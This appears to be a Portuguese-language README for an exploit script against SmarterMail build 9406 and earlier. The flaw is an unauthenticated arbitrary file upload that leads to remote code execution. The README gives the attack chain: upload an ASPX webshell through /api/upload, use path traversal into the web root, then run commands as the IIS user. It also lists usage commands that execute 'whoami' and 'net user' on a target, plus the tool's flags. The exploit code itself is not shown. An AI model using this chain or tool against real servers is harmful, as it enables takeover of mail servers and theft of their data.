
Exploit para upload arbitrário de arquivo não autenticado no SmarterMail levando à execução remota de código via implantação de webshell ASPX.
| Campo | Valor |
|---|
| Produto | SmarterMail |
| Afetado | Build 9406 e anteriores |
| CVSS | 10.0 (Crítico) |
| Tipo | Upload Arbitrário de Arquivos |
| Vetor | HTTP (não autenticado) |
| Impacto | Execução Remota de Código |
flowchart LR
A[Attacker] --> B["Find Upload Endpoint"]
B --> C["/api/upload"]
C --> D["Upload ASPX Shell"]
D --> E["Path Traversal"]
E --> F["../wwwroot/"]
F --> G["Access Shell"]
G --> H["RCE as IIS User"]A vulnerabilidade permite que atacantes não autenticados façam upload de arquivos arbitrários para qualquer local do servidor. Ao fazer upload de um webshell ASPX para a raiz da web, os atacantes conseguem execução de código.
Passos do Ataque:
python exploit.py https://mail.target.com
python exploit.py https://mail.target.com -c "whoami"
python exploit.py https://mail.target.com -c "net user"
| Flag | Descrição | Padrão |
|---|---|---|
-c, --command | Comando a executar | nenhum |
-t, --timeout | Timeout da requisição | 30 |
--check-only | Apenas verificar se está ativo | desativado |
requests
Apenas para testes de segurança autorizados.